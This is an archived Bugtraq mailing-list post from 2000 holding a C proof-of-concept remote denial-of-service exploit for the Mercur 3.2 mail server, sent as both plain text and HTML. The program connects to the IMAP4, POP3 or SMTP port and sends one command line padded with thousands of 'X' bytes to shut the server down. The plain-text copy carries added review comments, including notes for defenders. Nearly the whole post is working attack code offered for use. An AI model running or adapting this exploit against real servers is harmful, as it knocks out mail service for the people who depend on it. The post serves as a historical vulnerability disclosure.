[15320] in bugtraq


Remote DoS for Mercur 3.2

daemon@ATHENA.MIT.EDU (|[TDP]|)
Wed Jun 14 14:44:27 2000

Mime-Version: 1.0
Content-Type: multipart/alternative;
              boundary="----=_NextPart_000_004B_01BFD568.060B9280"
Message-Id:  <004e01bfd557$42dfd6a0$01dc11ac@ofi.peoplecall.com>
Date:         Tue, 13 Jun 2000 18:48:54 +0200
Reply-To: "|[TDP]|" <tdp@psynet.net>
From: "|[TDP]|" <tdp@PSYNET.NET>
To: BUGTRAQ@SECURITYFOCUS.COM

This is a multi-part message in MIME format.

------=_NextPart_000_004B_01BFD568.060B9280
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

/*
 * Remote Denial of Service for Mercur 3.2
 *
 * (C) |[TDP]|  - HaCk-13 TeaM -  2000      <tdp@psynet.net>
 *
 *
 * This code demonstrates a Mercur 3.2 vulnerability in which any remote
 * user can cause the server to shut down. Previous Mercur versions may
 * also be affected by this vulnerability.
 *
 * Greetings to all the other members and all my friends :)
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/*
 * Print the command-line synopsis and the list of protocol selector
 * values to stderr, then end the process with exit status 1.
 * This function does not return to its caller.
 */
void
usage (char *progname)
{
  static const char type_help[] =
    "   Type:\n"
    "      0 - IMAP4 (Default)\n"
    "      1 - POP3\n"
    "      2 - SMTP\n\n";

  fprintf (stderr, "Usage: %s <hostname> [type]\n", progname);
  fputs (type_help, stderr);
  exit (1);
}

/*
 * Proof-of-concept client from the advisory.  It builds one over-long
 * command line for the selected mail protocol, sends it over a single TCP
 * connection, waits four seconds and closes the socket.
 *
 *   argv[1]  host name or dotted-quad address of the server
 *   argv[2]  optional protocol selector: 1 = POP3 (port 110),
 *            2 = SMTP (port 25), anything else = IMAP4 (port 143)
 *
 * Returns 0 after the socket is closed, or -1 when socket(), the address
 * lookup, connect(), write() or close() is reported as failed.
 *
 * The advisory text only says that the server shuts down; the server-side
 * flaw itself is not described on this page.  The program never reads the
 * server banner or any reply, so it does not confirm the outcome.
 *
 * For defenders: the only traffic produced is a single USER, MAIL FROM or
 * LOGIN line whose argument is roughly 2 KB to 3 KB of 0x58 ('X') bytes.
 * That is far outside normal client behaviour, and a command-line length
 * limit enforced before parsing rejects it (RFC 5321 caps an SMTP command
 * line at 512 octets).
 *
 * NOTE(review): the listing is archived in quoted-printable form ("=3D"
 * stands for "=", a trailing "=" is a soft line break), so the text below
 * is not valid C exactly as shown.
 */
int
main (int argc, char **argv)
{
  /* buffer holds the filler argument, remotedos the full command line. */
  char *ptr, buffer[3000], remotedos[3100];
  /* NOTE(review): aux is declared but never used in this function. */
  int aux, sock, type;
  struct sockaddr_in sin;
  unsigned long ip;
  struct hostent *he;

  fprintf (stderr,
   "\n-=3D Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =3D-\n");

  /* usage() exits the process, so execution continues only with a host. */
  if (argc < 2)
    usage (argv[0]);

  /* Default selector is 0 (IMAP4); atol() yields 0 for non-numeric text. */
  type =3D 0;
  if (argc > 2)
    type =3D atol (argv[2]);

  /*
   * Fill the argument with 'X' (ASCII 88) and keep the last two bytes of
   * the cleared region as NUL so the result is a C string:
   *   type 1 (POP3)   -> 2046 'X' bytes
   *   any other type  -> 2998 'X' bytes (sizeof (buffer) - 2)
   */
  ptr =3D buffer;
  switch (type)
    {
    case 1:
      memset (ptr, 0, 2048);
      memset (ptr, 88, 2046);
      break;
    default:
      memset (ptr, 0, sizeof (buffer));
      memset (ptr, 88, sizeof (buffer) - 2);
      break;
    }

  bzero (remotedos, sizeof (remotedos));

  /*
   * Wrap the filler in the protocol's command, followed by three CRLF
   * pairs.  snprintf() is bounded by sizeof (remotedos), so the local
   * array itself cannot be overrun here.
   */
  switch (type)
    {
    case 1:
      snprintf (remotedos, sizeof (remotedos), "USER %s\r\n\r\n\r\n", =
buffer);
      break;
    case 2:
      snprintf (remotedos, sizeof (remotedos),
"MAIL FROM: %s@ThiSiSaDoS.c0m\r\n\r\n\r\n", buffer);
      break;
    default:
      snprintf (remotedos, sizeof (remotedos), "1000 LOGIN =
%s\r\n\r\n\r\n",
buffer);
      break;
    }

  if ((sock =3D socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
      perror ("socket()");
      return -1;
    }

  /*
   * Resolve argv[1] as a host name first and fall back to parsing it as a
   * dotted-quad address.
   * NOTE(review): h_addr is read through an unsigned long pointer, which
   * is wider than an IPv4 address where long is 64 bits.
   */
  if ((he =3D gethostbyname (argv[1])) !=3D NULL)
    {
      ip =3D *(unsigned long *) he->h_addr;
    }
  else
    {
      /*
       * NOTE(review): inet_addr() signals failure with INADDR_NONE, not
       * with NULL/0, so this comparison does not catch a malformed address.
       */
      if ((ip =3D inet_addr (argv[1])) =3D=3D NULL)
{
  perror ("inet_addr()");
  return -1;
}
    }

  sin.sin_family =3D AF_INET;
  sin.sin_addr.s_addr =3D ip;

  /* Destination port follows the selector: POP3 110, SMTP 25, IMAP4 143. */
  switch (type)
    {
    case 1:
      sin.sin_port =3D htons (110);
      break;
    case 2:
      sin.sin_port =3D htons (25);
      break;
    default:
      sin.sin_port =3D htons (143);
      break;
    }

  if (connect (sock, (struct sockaddr *) &sin, sizeof (sin)) < 0)
    {
      perror ("connect()");
      return -1;
    }

  /* Status banner only; nothing is read from the server at any point. */
  switch (type)
    {
    case 1:
      fprintf (stderr, "\nEngaged Mercur POP3... Sending data...\n");
      break;
    case 2:
      fprintf (stderr, "\nEngaged Mercur SMTP... Sending data...\n");
      break;
    default:
      fprintf (stderr, "\nEngaged Mercur IMAP4... Sending data...\n");
      break;
    }

  /*
   * The whole command line goes out in one write() call.
   * NOTE(review): write() returns a signed count that is compared with the
   * unsigned strlen() result; on typical platforms a -1 error return is
   * converted to a large unsigned value and this branch is not taken.
   */
  if (write (sock, remotedos, strlen (remotedos)) < strlen (remotedos))
    {
      perror ("write()");
      return -1;
    }

  /* Fixed 4-second pause before closing; the reason is not stated here. */
  sleep (4);

  fprintf (stderr, "Bye Bye baby!...\n\n");
  if (close (sock) < 0)
    {
      perror ("close()");
      return -1;
    }

  return (0);
}


------=_NextPart_000_004B_01BFD568.060B9280
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2722.2800" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>/*<BR>&nbsp;* Remote Denial of Service =
for Mercur=20
3.2<BR>&nbsp;* <BR>&nbsp;* (C) |[TDP]|&nbsp; - HaCk-13 TeaM -&nbsp;=20
2000&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;<A=20
href=3D"mailto:tdp@psynet.net">tdp@psynet.net</A>&gt;<BR>&nbsp;*<BR>&nbsp=
;*<BR>&nbsp;*=20
This code shows a Mercur 3.2 vulnerability in which, any =
remote<BR>&nbsp;* user=20
can cause server shutdown. Previous Mercur versions may be<BR>&nbsp;* =
affected=20
by this vulnerability.<BR>&nbsp;*<BR>&nbsp;* Greetings to all the other =
members=20
and all my friends :) <BR>&nbsp;*/<BR><BR>#include =
&lt;stdio.h&gt;<BR>#include=20
&lt;stdlib.h&gt;<BR>#include &lt;unistd.h&gt;<BR>#include=20
&lt;sys/socket.h&gt;<BR>#include &lt;sys/types.h&gt;<BR>#include=20
&lt;netdb.h&gt;<BR>#include &lt;netinet/in.h&gt;<BR>#include=20
&lt;arpa/inet.h&gt;<BR><BR>void<BR>usage (char *progname)<BR>{<BR>&nbsp; =
fprintf=20
(stderr, "Usage: %s &lt;hostname&gt; [type]\n", progname);<BR>&nbsp; =
fprintf=20
(stderr, "&nbsp;&nbsp; Type:\n");<BR>&nbsp; fprintf (stderr,=20
"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0 - IMAP4 (Default)\n");<BR>&nbsp; =
fprintf=20
(stderr, "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1 - POP3\n");<BR>&nbsp; fprintf =

(stderr, "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 2 - SMTP\n\n");<BR>&nbsp; exit=20
(1);<BR>}<BR><BR>int<BR>main (int argc, char **argv)<BR>{<BR>&nbsp; char =
*ptr,=20
buffer[3000], remotedos[3100];<BR>&nbsp; int aux, sock, type;<BR>&nbsp; =
struct=20
sockaddr_in sin;<BR>&nbsp; unsigned long ip;<BR>&nbsp; struct hostent=20
*he;<BR><BR>&nbsp; fprintf (stderr,<BR>&nbsp;&nbsp; "\n-=3D Remote DoS =
for Mercur=20
3.2 - (C) |[TDP]| - H13 Team =3D-\n");<BR><BR>&nbsp; if (argc &lt;=20
2)<BR>&nbsp;&nbsp;&nbsp; usage (argv[0]);<BR><BR>&nbsp; type =3D =
0;<BR>&nbsp; if=20
(argc &gt; 2)<BR>&nbsp;&nbsp;&nbsp; type =3D atol =
(argv[2]);<BR><BR>&nbsp; ptr =3D=20
buffer;<BR>&nbsp; switch (type)<BR>&nbsp;&nbsp;&nbsp; =
{<BR>&nbsp;&nbsp;&nbsp;=20
case 1:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memset (ptr, 0,=20
2048);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memset (ptr, 88,=20
2046);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break;<BR>&nbsp;&nbsp;&nbsp;=20
default:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memset (ptr, 0, sizeof=20
(buffer));<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memset (ptr, 88, sizeof =
(buffer) -=20
2);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break;<BR>&nbsp;&nbsp;&nbsp;=20
}<BR><BR>&nbsp; bzero (remotedos, sizeof (remotedos));<BR><BR>&nbsp; =
switch=20
(type)<BR>&nbsp;&nbsp;&nbsp; {<BR>&nbsp;&nbsp;&nbsp; case=20
1:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; snprintf (remotedos, sizeof =
(remotedos),=20
"USER %s\r\n\r\n\r\n", buffer);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
break;<BR>&nbsp;&nbsp;&nbsp; case 2:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
snprintf=20
(remotedos, sizeof (remotedos),<BR>"MAIL FROM: <A=20
href=3D'mailto:%s@ThiSiSaDoS.c0m\r\n\r\n\r\n"'>%s@ThiSiSaDoS.c0m\r\n\r\n\=
r\n"</A>,=20
buffer);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break;<BR>&nbsp;&nbsp;&nbsp;=20
default:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; snprintf (remotedos, sizeof=20
(remotedos), "1000 LOGIN=20
%s\r\n\r\n\r\n",<BR>buffer);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
break;<BR>&nbsp;&nbsp;&nbsp; }<BR><BR>&nbsp; if ((sock =3D socket =
(AF_INET,=20
SOCK_STREAM, IPPROTO_TCP)) &lt; 0)<BR>&nbsp;&nbsp;&nbsp;=20
{<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; perror=20
("socket()");<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return =
-1;<BR>&nbsp;&nbsp;&nbsp;=20
}<BR><BR>&nbsp; if ((he =3D gethostbyname (argv[1])) !=3D=20
NULL)<BR>&nbsp;&nbsp;&nbsp; {<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ip =3D =
*(unsigned=20
long *) he-&gt;h_addr;<BR>&nbsp;&nbsp;&nbsp; }<BR>&nbsp;=20
else<BR>&nbsp;&nbsp;&nbsp; {<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if ((ip =
=3D=20
inet_addr (argv[1])) =3D=3D NULL)<BR>{<BR>&nbsp; perror =
("inet_addr()");<BR>&nbsp;=20
return -1;<BR>}<BR>&nbsp;&nbsp;&nbsp; }<BR><BR>&nbsp; sin.sin_family =3D =

AF_INET;<BR>&nbsp; sin.sin_addr.s_addr =3D ip;<BR><BR>&nbsp; switch=20
(type)<BR>&nbsp;&nbsp;&nbsp; {<BR>&nbsp;&nbsp;&nbsp; case=20
1:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sin.sin_port =3D htons=20
(110);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break;<BR>&nbsp;&nbsp;&nbsp; =
case=20
2:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sin.sin_port =3D htons=20
(25);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break;<BR>&nbsp;&nbsp;&nbsp;=20
default:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sin.sin_port =3D htons=20
(143);<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; break;<BR>&nbsp;&nbsp;&nbsp;=20
}<BR><BR>&nbsp; if (connect (sock, (struct sockaddr *) &amp;sin, sizeof =
(sin))=20
&lt; 0)<BR>&nbsp;&nbsp;&nbsp; {<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; perror =

("connect()");<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return=20
-1;<BR>&nbsp;&nbsp;&nbsp; }<BR><BR>&nbsp; switch =
(type)<BR>&nbsp;&nbsp;&nbsp;=20
{<BR>&nbsp;&nbsp;&nbsp; case 1:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
fprintf=20
(stderr, "\nEngaged Mercur POP3... Sending=20
data...\n");<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
break;<BR>&nbsp;&nbsp;&nbsp; case=20
2:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; fprintf (stderr, "\nEngaged Mercur =
SMTP...=20
Sending data...\n");<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=20
break;<BR>&nbsp;&nbsp;&nbsp; default:<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
fprintf=20
(stderr, "\nEngaged Mercur IMAP4... Sending=20
data...\n");<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
break;<BR>&nbsp;&nbsp;&nbsp;=20
}<BR><BR>&nbsp; if (write (sock, remotedos, strlen (remotedos)) &lt; =
strlen=20
(remotedos))<BR>&nbsp;&nbsp;&nbsp; {<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
perror=20
("write()");<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return =
-1;<BR>&nbsp;&nbsp;&nbsp;=20
}<BR><BR>&nbsp; sleep (4);<BR><BR>&nbsp; fprintf (stderr, "Bye Bye=20
baby!...\n\n");<BR>&nbsp; if (close (sock) &lt; 0)<BR>&nbsp;&nbsp;&nbsp; =

{<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; perror=20
("close()");<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return =
-1;<BR>&nbsp;&nbsp;&nbsp;=20
}<BR><BR>&nbsp; return (0);<BR>}<BR></FONT></DIV></BODY></HTML>

------=_NextPart_000_004B_01BFD568.060B9280--
